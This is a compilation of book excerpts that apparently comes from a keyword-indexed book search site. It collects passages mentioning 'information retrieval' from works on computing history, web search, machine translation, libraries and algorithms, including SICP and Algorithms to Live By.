Another, called ANALOGY, did the same for the geometric questions found in IQ tests, while STUDENT cracked complex algebra story conundrums such as: ‘If the number of customers Tom gets is twice the square of 20 per cent of the number of advertisements he runs, and the number of advertisements he runs is 45, what is the number of customers Tom gets?fn1 A particularly impressive display of computational reasoning was a program called SIR (standing for Semantic Information Retrieval). SIR appeared to understand English sentences and was even able to learn relationships between objects in a way that resembled real intelligence. In reality, this ‘knowledge’ relied on a series of pre-programmed templates, such as A is a part of B, with nouns substituting for the variables. However, it was enough to suggest to the likes of Marvin Minsky that similar approaches could begin to tackle a variety of problems.


pages: 1,535 words: 337,071

Networks, Crowds, and Markets: Reasoning About a Highly Connected World by David Easley, Jon Kleinberg

Albert Einstein, AltaVista, clean water, conceptual framework, Daniel Kahneman / Amos Tversky, Douglas Hofstadter, Erdős number, experimental subject, first-price auction, fudge factor, George Akerlof, Gerard Salton, Gerard Salton, Gödel, Escher, Bach, incomplete markets, information asymmetry, information retrieval, John Nash: game theory, Kenneth Arrow, longitudinal study, market clearing, market microstructure, moral hazard, Nash equilibrium, Network effects, Pareto efficiency, Paul Erdős, planetary scale, prediction markets, price anchoring, price mechanism, prisoner's dilemma, random walk, recommendation engine, Richard Thaler, Ronald Coase, sealed-bid auction, search engine result page, second-price auction, second-price sealed-bid, Simon Singh, slashdot, social web, Steve Jobs, stochastic process, Ted Nelson, The Market for Lemons, The Wisdom of Crowds, trade route, transaction costs, ultimatum game, Vannevar Bush, Vickrey auction, Vilfredo Pareto, Yogi Berra, zero-sum game

Before discussing some of the ideas behind the ranking of pages, let’s begin by considering some of the basic reasons why it’s a hard problem. First, search is a hard problem for computers to solve in any setting, not just on the Web. Indeed, the field of information retrieval [35, 354] has dealt with this problem for decades before the creation of the Web: automated information retrieval systems starting in the 1960s were designed to search repositories of newspaper articles, scientific papers, patents, legal abstracts, and other document collections in reponse to keyword queries. Information retrieval systems have always had to deal with the problem that keywords are a very limited way to express a complex information need; in addition to the fact that a list of keywords is short and inexpressive, it suffers from the problems of synonomy (multiple ways to say the same thing, so that your search for recipes involving scallions fails because the recipe you wanted called them “green onions”) and pol-ysemy (multiple meaning for the same term, so that your search for information about the animal called a jaguar instead produces results primarily about automobiles, football players, and an operating system for the Apple Macintosh.)

With this in mind, people who depended on the success of their Web sites increasingly began modifying their Web-page authoring styles to score highly in search engine rankings. For people who had conceived of Web search as a kind of classical information retrieval application, this was something novel. Back in the 1970s and 1980s, when people designed information retrieval tools for scientific papers or newspaper articles, authors were not overtly writing their papers or abstracts with these search tools in mind.4 From the relatively early days of the Web, however, people have written Web pages with search engines quite explicitly in mind. At first, this was often done using over-the-top tricks that aroused the ire of the search industry; as the digital librarian Cliff Lynch noted at the time, “Web search is a new kind of information retrieval application in that the documents are actively behaving badly.” Over time though, the use of focused techniques to improve a page’s performance in search engine rankings became regularized and accepted, and guidelines for designing these techniques emerged; a fairly large industry known as search engine optimization (SEO) came into being, consisting of search experts who advise companies on how to create pages and sites that rank highly.

Information retrieval systems have always had to deal with the problem that keywords are a very limited way to express a complex information need; in addition to the fact that a list of keywords is short and inexpressive, it suffers from the problems of synonomy (multiple ways to say the same thing, so that your search for recipes involving scallions fails because the recipe you wanted called them “green onions”) and pol-ysemy (multiple meaning for the same term, so that your search for information about the animal called a jaguar instead produces results primarily about automobiles, football players, and an operating system for the Apple Macintosh.) For a long time, up through the 1980s, information retrieval was the province of reference D. Easley and J. Kleinberg. Networks, Crowds, and Markets: Reasoning about a Highly Connected World. To be published by Cambridge University Press, 2010. Draft version: September 29, 2009. 405 406 CHAPTER 14. LINK ANALYSIS AND WEB SEARCH librarians, patent attorneys, and other people whose jobs consisted of searching collections of documents; such people were trained in how to formulate effective queries, and the documents they were searching tended to be written by professionals, using a controlled style and vocabulary. With the arrival of the Web, where everyone is an author and everyone is a searcher, the problems surrounding information retrieval exploded in scale and complexity. To begin with, the diversity in authoring styles makes it much harder to rank documents according to a common criterion: on a single topic, one can easily find pages written by experts, novices, children, conspiracy theorists — and not necessarily be able to tell which is which.


Cataloging the World: Paul Otlet and the Birth of the Information Age by Alex Wright

1960s counterculture, Ada Lovelace, barriers to entry, British Empire, business climate, business intelligence, Cape to Cairo, card file, centralized clearinghouse, corporate governance, crowdsourcing, Danny Hillis, Deng Xiaoping, don't be evil, Douglas Engelbart, Douglas Engelbart, Electric Kool-Aid Acid Test, European colonialism, Frederick Winslow Taylor, hive mind, Howard Rheingold, index card, information retrieval, invention of movable type, invention of the printing press, Jane Jacobs, John Markoff, Kevin Kelly, knowledge worker, Law of Accelerating Returns, linked data, Livingstone, I presume, lone genius, Menlo Park, Mother of all demos, Norman Mailer, out of africa, packet switching, profit motive, RAND corporation, Ray Kurzweil, Scramble for Africa, self-driving car, semantic web, Silicon Valley, speech recognition, Steve Jobs, Stewart Brand, Ted Nelson, The Death and Life of Great American Cities, the scientific method, Thomas L Friedman, urban planning, Vannevar Bush, Whole Earth Catalog

In 1780, an Austrian named Gerhard van Swieten further adapted the technique to create a master catalog for the Austrian National Library, known as the Josephinian Catalog (named for Austria’s “enlightened despot” Joseph II). Van Swieten decided to store his catalog cards in 205 wooden boxes, sealed in an airtight locker—the first recognizable precursor to the once familiar, now rapidly disappearing, library card catalog.23 Today, we might tend to think of the card catalog as a simplistic information retrieval tool: the dominion of somber librarians in fusty reading rooms. However, to take such a dismissive view of these compact, efficient systems—the direct ancestors of the modern database—may lead us to overlook the critical role they played in the industrial information explosion that would reshape the European world in the nineteenth century. In 1832, William Strange published the first volume of his Penny StoryTeller, a forty-six-page chapbook printed on cheap paper whose table of contents listed such fare as “The Cure of Consumption,” 33 C ATA L O G I N G T H E WO R L D “House and Household,” and “Conscience Makes Cowards.”

Bryce—who had worked closely with Herman Hollerith on some of the company’s earliest punch-card technology11— promptly snapped up the rights (Goldberg had transferred the patent to his employer for the grand sum of $2.00). In the mid-1930s, IBM was building its portfolio of electronic devices (even before it had started manufacturing any of them), long before Vannevar Bush, then dean of engineering at the Massachusetts Institute of Technology, published his famous essay “As We May Think.” Today, most computer science historians have characterized Bush’s Rapid Selector as the first electronic information-retrieval machine. When Bush tried to patent his invention in 1937 and 1940, however, the U.S. Patent Office turned him down, citing Goldberg’s work. And while there is no evidence that Goldberg’s invention directly influenced Bush’s work, Donker Duyvis—Paul Otlet’s eventual successor at the IIB—did tell Bush about Goldberg’s ­invention in 1946.12 Despite his considerable achievements, Goldberg remains all but unknown today.

Only when the conflict between nation-states had been eliminated could humanity finally realize its spiritual and intellectual potential. Worldwide dissemination of recorded knowledge was an essential step along that path. Like Otlet, Wells believed that better access to information might help prevent future wars. Beginning with his 1905 work, A Modern Utopia, Wells had developed a fascination with the problem of information retrieval— the need for better methods for organizing the world’s recorded knowledge. This led him to reject old values and institutional strictures and embrace a mechanistic approach, one founded on Taylorist ideals of scientific management and a belief in the power of science to solve humanity’s problems, and the coming war in particular. The political and economic imbalances that were leading to war resembled diseases attacking a body beset by a compromised nervous system.


pages: 174 words: 56,405

Machine Translation by Thierry Poibeau

AltaVista, augmented reality, call centre, Claude Shannon: information theory, cloud computing, combinatorial explosion, crowdsourcing, easy for humans, difficult for computers, en.wikipedia.org, Google Glasses, information retrieval, Internet of things, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, natural language processing, Necker cube, Norbert Wiener, RAND corporation, Robert Mercer, Skype, speech recognition, statistical model, technological singularity, Turing test, wikimedia commons

Speech translation has become a hot topic (“speech to speech” applications aim at making it possible to speak in one’s own language with another interlocutor speaking in a foreign language by using live automated translation). The machine translation market is growing fast. Over the last few years we have witnessed the emergence of new applications, particularly on mobile devices. Cross-Language Information Retrieval Cross-language information retrieval aims to give access to documents initially written in different languages. Consider research on patents: when a company seeks to know if an idea or a process has already been patented, it must ensure that its research is exhaustive and covers all parts of the world. It is therefore fundamental to cross the language barrier, for both the query (i.e., the information need expressed through keywords) and the analysis of the responses (i.e., documents relevant to the information need).

See Evaluation measure and test Computational linguistics, 15, 36, 37, 68, 82–84 Computation time, 54, 149, 155, 170, Computer documentation, 119 Confidential data 230–231. See also Intelligence services Connected objects. See Smart glasses; Smart watch Construction (linguistic), 23 Context (linguistic), 17–21, 31, 34, 54–56, 64–67, 71, 92, 117–119, 129, 150, 176–178, 186, 188, 215–216, 238 Continuous model, 186–187 Conversational agent, 2. See also Artificial dialogue Coordination, 175 Corpus alignment, 91–108 Cross-language information retrieval, 238–239 Cryptography, 49, 52, 56, 58–60 Cryptology. See Cryptography CSLi, 232, 236 Cultural hegemony, 168, 250–251 Czech, 210, 213 DARPA, 200–203, 209, 259 Database access, 241 Date expressions, 115, 152, 160 Deceptive cognate, 11, 261 Decoder, 141, 144, 185, 186, 190 Deep learning, 34–35, 37, 170, 181–195, 228, 234, 247, 253–255 Deepmind, 182 Defense industry, 77, 88, 173, 232–233, 235 De Firmas-Périés, Arman-Charles-Daniel, 41 De Maimieux, Joseph, 41 Descartes, René, 40–42 Determiner, 133, 215 Dialogue.

See Professional translator Hungarian, 212, 213 Hutchins, John, 41, 44, 75, 81–82, 84, 229, 267–270 Hybrid system machine translation, 165, 170, 171–172, 218, 234 IBM, 36, 61, 68, 74, 126–145, 185, 197, 199, 200, 209, 212, 228, 232 IBM WebSphere. See Machine translation systems Ideographic writing system, 105 Idiom. See Idiomatic expression Idiomatic expression, 10, 11, 15, 23, 28, 30, 33, 115, 125, 178, 217, 219, 262 Iida, Hitoshi, 117 Image recognition, 183 Indirect machine translation, 25–32 Indo-European languages, 165, 213, 214, 250 Information retrieval, 45, 92, 238–239 Informativeness, 201, 206 Intelligence industry. See Intelligence services Intelligence services, 77, 89, 173, 225, 233, 235, 249 Interception (of communications), 225, 232 Interlingua, 24, 28–32, 40, 58, 63, 66–68, 85, 262 Interlingual machine translation. See Interlingua Intermediate representation, 25–32, 63 Internet, 33, 93, 97, 98, 100, 102, 164, 166, 168–169, 172, 197, 227–233, 238, 242–243, 247–250 link, 98–99 Interpretation, 20, 201 Island of confidence, 102, 108, 150 Isolating language, 215–216 Israel, 60, 69 Japan, 44, 67, 86, 87, 109 Japanese, 11, 88, 117–118, 164–165, 192, 242 Jibbigo, 236 JRC-Acquis corpus, 97, 212–213, 223 Keyword, 92, 99, 238 Kilgarriff, Adam, 18 King, Gilbert, 76 Kircher, Athanasius, 41 Koehn, Philip, 136, 212–213 Korean, 88, 235–236 Language complexity (see Complexity) diversity, 1, 164–170 (see also typology) exposure (see Child language acquisition) family, 30, 106, 138, 172–174 independent representation (see Interlingua) learning (see Child language acquisition) model, 127, 140, 142, 144, 153, 185 proximity, 163 (see also family) typology, 138, 192 (see also family) universal, 56, 66, 67 (see also Universal language) Lavie, Alon, 206 Learning step (or learning phase).


pages: 394 words: 108,215

What the Dormouse Said: How the Sixties Counterculture Shaped the Personal Computer Industry by John Markoff

Any sufficiently advanced technology is indistinguishable from magic, Apple II, back-to-the-land, beat the dealer, Bill Duvall, Bill Gates: Altair 8800, Buckminster Fuller, California gold rush, card file, computer age, computer vision, conceptual framework, cuban missile crisis, different worldview, Donald Knuth, Douglas Engelbart, Douglas Engelbart, Dynabook, Edward Thorp, El Camino Real, Electric Kool-Aid Acid Test, general-purpose programming language, Golden Gate Park, Hacker Ethic, hypertext link, informal economy, information retrieval, invention of the printing press, Jeff Rulifson, John Markoff, John Nash: game theory, John von Neumann, Kevin Kelly, knowledge worker, Mahatma Gandhi, Menlo Park, Mother of all demos, Norbert Wiener, packet switching, Paul Terrell, popular electronics, QWERTY keyboard, RAND corporation, RFC: Request For Comment, Richard Stallman, Robert X Cringely, Sand Hill Road, Silicon Valley, Silicon Valley startup, South of Market, San Francisco, speech recognition, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, The Hackers Conference, Thorstein Veblen, Turing test, union organizing, Vannevar Bush, Whole Earth Catalog, William Shockley: the traitorous eight

But the AI researchers translated his ideas into their own, and the concept of Augmentation seemed pallid when viewed through their eyes, reduced to the more mundane idea of information retrieval, missing Engelbart’s dream entirely.4 Gradually, he began to understand that the AI community was actually his philosophical enemy. After all, their vision was to replace humans with machines, while he wanted to extend and empower people. Engelbart would later say that he had nothing against the vision of AI but just believed that it would be decades and decades before it could be realized. He thought his idea was the one that was more practical. He frequently ran up against a wall of intellectual prejudice, which continued to plague him throughout his career. In 1960, Engelbart presented a paper at the annual meeting of the American Documentation Institute, outlining how computer systems of the future might change the role of information-retrieval specialists.

In 1960, Engelbart presented a paper at the annual meeting of the American Documentation Institute, outlining how computer systems of the future might change the role of information-retrieval specialists. The idea didn’t sit at all well with his audience, which gave his paper a blasé reception. He also got into an argument with a researcher who asserted that Engelbart was proposing nothing that was any different from any of the other information-retrieval efforts that were already under way. It was a long and lonely two years. The state of the art of computer science was moving quickly toward mathematical algorithms, and the computer scientists looked down their nose at his work, belittling it as mere office automation and hence beneath their notice. Moreover, his support from the air force was slightly suspect as well. The Office of Scientific Research had a reputation for funding way-out ideas, or in some cases outright kooks. Engelbart’s research was in danger of being thrown in with the work of somebody who was studying the clustering behavior of gnats.

There was an abyss between the original work done by Engelbart’s group in the sixties and the motley crew of hobbyists that would create the personal-computer industry beginning in 1975. In their hunger to possess their own computers, the PC hobbyists would miss the crux of the original idea: communications as an integral part of the design. That was at the heart of the epiphanies that Engelbart had years earlier, which led to the realization of Vannevar Bush’s Memex information-retrieval system of the 1940s. During the period from the early 1960s until 1969, when most of the development of the NLS system was completed, Engelbart and his band of researchers remained in a comfortable bubble. They were largely Pentagon funded, but unlike many of the engineering and computing groups that surrounded them at SRI, they weren’t doing work that directly contributed to the Vietnam War.


pages: 893 words: 199,542

Structure and interpretation of computer programs by Harold Abelson, Gerald Jay Sussman, Julie Sussman

Andrew Wiles, conceptual framework, Donald Knuth, Douglas Hofstadter, Eratosthenes, Fermat's Last Theorem, Gödel, Escher, Bach, industrial robot, information retrieval, iterative process, Johannes Kepler, loose coupling, probability theory / Blaise Pascal / Pierre de Fermat, Richard Stallman, Turing machine

What is the order of growth in the number of steps required by list->tree to convert a list of n elements? Exercise 2.65. Use the results of exercises 2.63 and 2.64 to give θ(n) implementations of union-set and intersection-set for sets implemented as (balanced) binary trees.41 Sets and information retrieval We have examined options for using lists to represent sets and have seen how the choice of representation for a data object can have a large impact on the performance of the programs that use the data. Another reason for concentrating on sets is that the techniques discussed here appear again and again in applications involving information retrieval. Consider a data base containing a large number of individual records, such as the personnel files for a company or the transactions in an accounting system. A typical data-management system spends a large amount of time accessing or modifying the data in the records and therefore requires an efficient method for accessing records.

In particular, there will be an “eval” part that classifies expressions according to type and an “apply” part that implements the language's abstraction mechanism (procedures in the case of Lisp, and rules in the case of logic programming). Also, a central role is played in the implementation by a frame data structure, which determines the correspondence between symbols and their associated values. One additional interesting aspect of our query-language implementation is that we make substantial use of streams, which were introduced in chapter 3. 4.4.1 Deductive Information Retrieval Logic programming excels in providing interfaces to data bases for information retrieval. The query language we shall implement in this chapter is designed to be used in this way. In order to illustrate what the query system does, we will show how it can be used to manage the data base of personnel records for Microshaft, a thriving high-technology company in the Boston area. The language provides pattern-directed access to personnel information and can also take advantage of general rules in order to make logical deductions.

The resulting RSA algorithm has become a widely used technique for enhancing the security of electronic communications. Because of this and related developments, the study of prime numbers, once considered the epitome of a topic in “pure” mathematics to be studied only for its own sake, now turns out to have important practical applications to cryptography, electronic funds transfer, and information retrieval. 1.3 Formulating Abstractions with Higher-Order Procedures We have seen that procedures are, in effect, abstractions that describe compound operations on numbers independent of the particular numbers. For example, when we (define (cube x) (* x x x)) we are not talking about the cube of a particular number, but rather about a method for obtaining the cube of any number.


pages: 523 words: 143,139

Algorithms to Live By: The Computer Science of Human Decisions by Brian Christian, Tom Griffiths

4chan, Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, algorithmic trading, anthropic principle, asset allocation, autonomous vehicles, Bayesian statistics, Berlin Wall, Bill Duvall, bitcoin, Community Supported Agriculture, complexity theory, constrained optimization, cosmological principle, cryptocurrency, Danny Hillis, David Heinemeier Hansson, delayed gratification, dematerialisation, diversification, Donald Knuth, double helix, Elon Musk, fault tolerance, Fellow of the Royal Society, Firefox, first-price auction, Flash crash, Frederick Winslow Taylor, George Akerlof, global supply chain, Google Chrome, Henri Poincaré, information retrieval, Internet Archive, Jeff Bezos, Johannes Kepler, John Nash: game theory, John von Neumann, Kickstarter, knapsack problem, Lao Tzu, Leonard Kleinrock, linear programming, martingale, Nash equilibrium, natural language processing, NP-complete, P = NP, packet switching, Pierre-Simon Laplace, prediction markets, race to the bottom, RAND corporation, RFC: Request For Comment, Robert X Cringely, Sam Altman, sealed-bid auction, second-price auction, self-driving car, Silicon Valley, Skype, sorting algorithm, spectrum auction, Stanford marshmallow experiment, Steve Jobs, stochastic process, Thomas Bayes, Thomas Malthus, traveling salesman, Turing machine, urban planning, Vickrey auction, Vilfredo Pareto, Walter Mischel, Y Combinator, zero-sum game

the information retrieval systems of university libraries: Anderson’s findings on human memory are published in Anderson and Milson, “Human Memory,” and in the book The Adaptive Character of Thought. This book has been influential for laying out a strategy for analyzing everyday cognition in terms of ideal solutions, used by Tom and many others in their research. Anderson and Milson, “Human Memory,” in turn, draws from a statistical study of library borrowing that appears in Burrell, “A Simple Stochastic Model for Library Loans.” the missing piece in the study of the mind: Anderson’s initial exploration of connections between information retrieval by computers and the organization of human memory was conducted in an era when most people had never interacted with an information retrieval system, and the systems in use were quite primitive.

In 1987, Carnegie Mellon psychologist and computer scientist John Anderson found himself reading about the information retrieval systems of university libraries. Anderson’s goal—or so he thought—was to write about how the design of those systems could be informed by the study of human memory. Instead, the opposite happened: he realized that information science could provide the missing piece in the study of the mind. “For a long time,” says Anderson, “I had felt that there was something missing in the existing theories of human memory, including my own. Basically, all of these theories characterize memory as an arbitrary and non-optimal configuration.… I had long felt that the basic memory processes were quite adaptive and perhaps even optimal; however, I had never been able to see a framework in which to make this point. In the computer science work on information retrieval, I saw that framework laid out before me.”

“Some things that might seem frustrating as we grow older (like remembering names!) are a function of the amount of stuff we have to sift through … and are not necessarily a sign of a failing mind.” As he puts it, “A lot of what is currently called decline is simply learning.” Caching gives us the language to understand what’s happening. We say “brain fart” when we should really say “cache miss.” The disproportionate occasional lags in information retrieval are a reminder of just how much we benefit the rest of the time by having what we need at the front of our minds. So as you age, and begin to experience these sporadic latencies, take heart: the length of a delay is partly an indicator of the extent of your experience. The effort of retrieval is a testament to how much you know. And the rarity of those lags is a testament to how well you’ve arranged it: keeping the most important things closest to hand. 5 Scheduling First Things First How we spend our days is, of course, how we spend our lives.


pages: 250 words: 73,574

Nine Algorithms That Changed the Future: The Ingenious Ideas That Drive Today's Computers by John MacCormick, Chris Bishop

Ada Lovelace, AltaVista, Claude Shannon: information theory, fault tolerance, information retrieval, Menlo Park, PageRank, pattern recognition, Richard Feynman, Silicon Valley, Simon Singh, sorting algorithm, speech recognition, Stephen Hawking, Steve Jobs, Steve Wozniak, traveling salesman, Turing machine, Turing test, Vannevar Bush

To summarize: although humans don't use NEAR queries much, search engines use the information about nearness constantly to improve their rankings—and the reason they can do this efficiently is because they use the word-location trick. An example set of web pages that each have a title and a body. We already know that the Babylonians were using indexing 5000 years before search engines existed. It turns out that search engines did not invent the word-location trick either: this is a well-known technique that was used in other types of information retrieval before the internet arrived on the scene. However, in the next section we will learn about a new trick that does appear to have been invented by search engine designers: the metaword trick. The cunning use of this trick and various related ideas helped to catapult the AltaVista search engine to the top of the search industry in the late 1990s. THE METAWORD TRICK So far, we've been using extremely simple examples of web pages.

Public key cryptography and the related digital signature algorithms are examples of this. In other cases, the algorithms may have existed in the research community for some time, waiting in the wings for the right wave of new technology to give them wide applicability. The search algorithms for indexing and ranking fall into this category: similar algorithms had existed for years in the field known as information retrieval, but it took the phenomenon of web search to make these algorithms “great,” in the sense of daily use by ordinary computer users. Of course, the algorithms also evolved for their new application; PageRank is a good example of this. Note that the emergence of new technology does not necessarily lead to new algorithms. Consider the phenomenal growth of laptop computers over the 1980s and 1990s.

Among the many college-level computer science texts on algorithms, three particularly readable options are Algorithms, by Dasgupta, Papadimitriou, and Vazirani; Algorithmics: The Spirit of Computing, by Harel and Feldman; and Introduction to Algorithms, by Cormen, Leiserson, Rivest, and Stein. Search engine indexing (chapter 2). The original AltaVista patent covering the metaword trick is U.S. patent 6105019, “Constrained Searching of an Index,” by Mike Burrows (2000). For readers with a computer science background, Search Engines: Information Retrieval in Practice, by Croft, Metzler, and Strohman, is a good option for learning more about indexing and many other aspects of search engines. PageRank (chapter 3). The opening quotation by Larry Page is taken from an interview by Ben Elgin, published in Businessweek, May 3, 2004. Vannevar Bush's “As We May Think” was, as mentioned above, originally published in The Atlantic magazine (July 1945).


pages: 397 words: 102,910

The Idealist: Aaron Swartz and the Rise of Free Culture on the Internet by Justin Peters

4chan, activist lawyer, Any sufficiently advanced technology is indistinguishable from magic, Bayesian statistics, Brewster Kahle, buy low sell high, crowdsourcing, disintermediation, don't be evil, global village, Hacker Ethic, hypertext link, index card, informal economy, information retrieval, Internet Archive, invention of movable type, invention of writing, Isaac Newton, John Markoff, Joi Ito, Lean Startup, moral panic, Paul Buchheit, Paul Graham, profit motive, RAND corporation, Republic of Letters, Richard Stallman, selection bias, semantic web, Silicon Valley, social web, Steve Jobs, Steven Levy, Stewart Brand, strikebreaker, Vannevar Bush, Whole Earth Catalog, Y Combinator

His brief remarks to the group at Woods Hole were wistful: “I merely wish I were young enough to participate with you in the fascinating intricacies you will encounter and bring under your control.”48 Vannevar rhymes with believer, and when it came to government funding of scientific research, Bush certainly was. He was also a lifelong believer in libraries, and the benefits to be derived from their automation. In 1945, he published an article in the Atlantic Monthly that proposed a rudimentary mechanized library called Memex, a linked-information retrieval system. Memex was a desk-size machine that was equal parts stenographer, filing cabinet, and reference librarian: “a device in which an individual stores his books, records, and communications, and which is mechanized so that it may be consulted with exceeding speed and flexibility.”49 The goal was to build a machine that could capture a user’s thought patterns, compile and organize his reading material and correspondence, and record the resulting “associative trails” between them all, such that the user could trace his end insights back to conception.

The Chicago Tribune opined, “The school mimeograph should be viewed not as a piratical rival to the trade publisher but as a helpful unpaid publicity agent who helps publishers’ long-term sales.”59 That argument didn’t take root. The rise of photoduplication technologies that facilitated the rapid spread of information merely underscored the fragility of copyright holders’ claims that intellectual property was indistinguishable from regular physical property. “We know that volumes of information can be stored on microfilm and magnetic tape. We keep hearing about information-retrieval networks,” former senator Kenneth B. Keating told Congress in 1965. “The inexorable question arises—what will happen in the long run if authors’ income is cut down and down by increasing free uses by photocopy and information storage and retrieval? Will the authors continue writing? Will the publishers continue publishing if their markets are diluted, eroded, and eventually, the profit motive and incentive completely destroyed?

Though he took a moment to celebrate what he deemed “the pinnacle of my career,” he couldn’t help but predict that future milestones would likely be few and far between, unless the American reading public took control of its nation’s copyright laws. Project Gutenberg had become an eloquent counterargument to copyright advocates’ dismissive claims about the public domain. It demonstrated just how easily a network could be used to breathe new life into classics that might otherwise go unseen. Despite the existence of initiatives such as Project Gutenberg, despite the emergence of the Internet as a new medium for information retrieval and distribution, the same official attitudes about intellectual property prevailed. The public domain was regarded as a penalty rather than as an opportunity. Parochial concerns were conflated with the public interest. The rise of the Internet might portend an informational revolution, but from the standpoint of the people in power, Hart warned, revolution was a bad thing. “Every single time a new publishing technique has promised to get the common people a home library, laws have been passed to stop, dead in its tracks, this kind of ‘Information Age,’ ” Hart wrote.


pages: 1,387 words: 202,295

Structure and Interpretation of Computer Programs, Second Edition by Harold Abelson, Gerald Jay Sussman, Julie Sussman

Andrew Wiles, conceptual framework, Donald Knuth, Douglas Hofstadter, Eratosthenes, Gödel, Escher, Bach, industrial robot, information retrieval, iterative process, Johannes Kepler, loose coupling, probability theory / Blaise Pascal / Pierre de Fermat, Richard Stallman, Turing machine, wikimedia commons

What is the order of growth in the number of steps required by list->tree to convert a list of elements? Exercise 2.65: Use the results of Exercise 2.63 and Exercise 2.64 to give implementations of union-set and intersection-set for sets implemented as (balanced) binary trees.107 Sets and information retrieval We have examined options for using lists to represent sets and have seen how the choice of representation for a data object can have a large impact on the performance of the programs that use the data. Another reason for concentrating on sets is that the techniques discussed here appear again and again in applications involving information retrieval. Consider a data base containing a large number of individual records, such as the personnel files for a company or the transactions in an accounting system. A typical data-management system spends a large amount of time accessing or modifying the data in the records and therefore requires an efficient method for accessing records.

In particular, there will be an “eval” part that classifies expressions according to type and an “apply” part that implements the language’s abstraction mechanism (procedures in the case of Lisp, and rules in the case of logic programming). Also, a central role is played in the implementation by a frame data structure, which determines the correspondence between symbols and their associated values. One additional interesting aspect of our query-language implementation is that we make substantial use of streams, which were introduced in Chapter 3. 4.4.1Deductive Information Retrieval Logic programming excels in providing interfaces to data bases for information retrieval. The query language we shall implement in this chapter is designed to be used in this way. In order to illustrate what the query system does, we will show how it can be used to manage the data base of personnel records for Microshaft, a thriving high-technology company in the Boston area. The language provides pattern-directed access to personnel information and can also take advantage of general rules in order to make logical deductions.

2.1.4 Extended Exercise: Interval Arithmetic 2.2 Hierarchical Data and the Closure Property 2.2.1 Representing Sequences 2.2.2 Hierarchical Structures 2.2.3 Sequences as Conventional Interfaces 2.2.4 Example: A Picture Language 2.3 Symbolic Data 2.3.1 Quotation 2.3.2 Example: Symbolic Differentiation 2.3.3 Example: Representing Sets 2.3.4 Example: Huffman Encoding Trees 2.4 Multiple Representations for Abstract Data 2.4.1 Representations for Complex Numbers 2.4.2 Tagged data 2.4.3 Data-Directed Programming and Additivity 2.5 Systems with Generic Operations 2.5.1 Generic Arithmetic Operations 2.5.2 Combining Data of Different Types 2.5.3 Example: Symbolic Algebra 3 Modularity, Objects, and State 3.1 Assignment and Local State 3.1.1 Local State Variables 3.1.2 The Benefits of Introducing Assignment 3.1.3 The Costs of Introducing Assignment 3.2 The Environment Model of Evaluation 3.2.1 The Rules for Evaluation 3.2.2 Applying Simple Procedures 3.2.3 Frames as the Repository of Local State 3.2.4 Internal Definitions 3.3 Modeling with Mutable Data 3.3.1 Mutable List Structure 3.3.2 Representing Queues 3.3.3 Representing Tables 3.3.4 A Simulator for Digital Circuits 3.3.5 Propagation of Constraints 3.4 Concurrency: Time Is of the Essence 3.4.1 The Nature of Time in Concurrent Systems 3.4.2 Mechanisms for Controlling Concurrency 3.5 Streams 3.5.1 Streams Are Delayed Lists 3.5.2 Infinite Streams 3.5.3 Exploiting the Stream Paradigm 3.5.4 Streams and Delayed Evaluation 3.5.5 Modularity of Functional Programs and Modularity of Objects 4 Metalinguistic Abstraction 4.1 The Metacircular Evaluator 4.1.1 The Core of the Evaluator 4.1.2 Representing Expressions 4.1.3 Evaluator Data Structures 4.1.4 Running the Evaluator as a Program 4.1.5 Data as Programs 4.1.6 Internal Definitions 4.1.7 Separating Syntactic Analysis from Execution 4.2 Variations on a Scheme — Lazy Evaluation 4.2.1 Normal Order and Applicative Order 4.2.2 An Interpreter with Lazy Evaluation 4.2.3 Streams as Lazy Lists 4.3 Variations on a Scheme — Nondeterministic Computing 4.3.1 Amb and Search 4.3.2 Examples of Nondeterministic Programs 4.3.3 Implementing the Amb Evaluator 4.4 Logic Programming 4.4.1 Deductive Information Retrieval 4.4.2 How the Query System Works 4.4.3 Is Logic Programming Mathematical Logic? 4.4.4 Implementing the Query System 4.4.4.1 The Driver Loop and Instantiation 4.4.4.2 The Evaluator 4.4.4.3 Finding Assertions by Pattern Matching 4.4.4.4 Rules and Unification 4.4.4.5 Maintaining the Data Base 4.4.4.6 Stream Operations 4.4.4.7 Query Syntax Procedures 4.4.4.8 Frames and Bindings 5 Computing with Register Machines 5.1 Designing Register Machines 5.1.1 A Language for Describing Register Machines 5.1.2 Abstraction in Machine Design 5.1.3 Subroutines 5.1.4 Using a Stack to Implement Recursion 5.1.5 Instruction Summary 5.2 A Register-Machine Simulator 5.2.1 The Machine Model 5.2.2 The Assembler 5.2.3 Generating Execution Procedures for Instructions 5.2.4 Monitoring Machine Performance 5.3 Storage Allocation and Garbage Collection 5.3.1 Memory as Vectors 5.3.2 Maintaining the Illusion of Infinite Memory 5.4 The Explicit-Control Evaluator 5.4.1 The Core of the Explicit-Control Evaluator 5.4.2 Sequence Evaluation and Tail Recursion 5.4.3 Conditionals, Assignments, and Definitions 5.4.4 Running the Evaluator 5.5 Compilation 5.5.1 Structure of the Compiler 5.5.2 Compiling Expressions 5.5.3 Compiling Combinations 5.5.4 Combining Instruction Sequences 5.5.5 An Example of Compiled Code 5.5.6 Lexical Addressing 5.5.7 Interfacing Compiled Code to the Evaluator References List of Exercises List of Figures Term Index Colophon Next: UTF, Prev: (dir), Up: (dir) [Contents] Next: UTF, Prev: (dir), Up: (dir) [Contents] Next: Dedication, Prev: Top, Up: Top [Contents] Unofficial Texinfo Format This is the second edition SICP book, from Unofficial Texinfo Format.


The Card Catalog: Books, Cards, and Literary Treasures by Library Of Congress, Carla Hayden

In Cold Blood by Truman Capote, index card, information retrieval, Johannes Kepler, late fees

By the 1950s, as the main card catalog at the Library of Congress surged to more than nine million cards crammed into 10,500 trays, the administration kept a watchful eye on nascent computer technology as a possible solution to the looming catalog crisis. About the same time, the handful of computer companies that existed were making major innovations and had moved away from the punched-card system, advancing to vacuum tubes and magnetic tapes. Seeing new possibilities for cataloging and storing data, Librarian of Congress Lawrence Quincy Mumford established the Committee on Mechanized Information Retrieval in January 1958. In the years that followed, and with the approval of Congress, the Library purchased an IBM 1401, a small-scale computer system the size of a Volkswagen bus. The committee also recommended establishing a group to both design and implement the procedures required to automate the catalog. Unfortunately, there were few computer programmers around. The early ones were usually mathematicians, including one Henriette D.

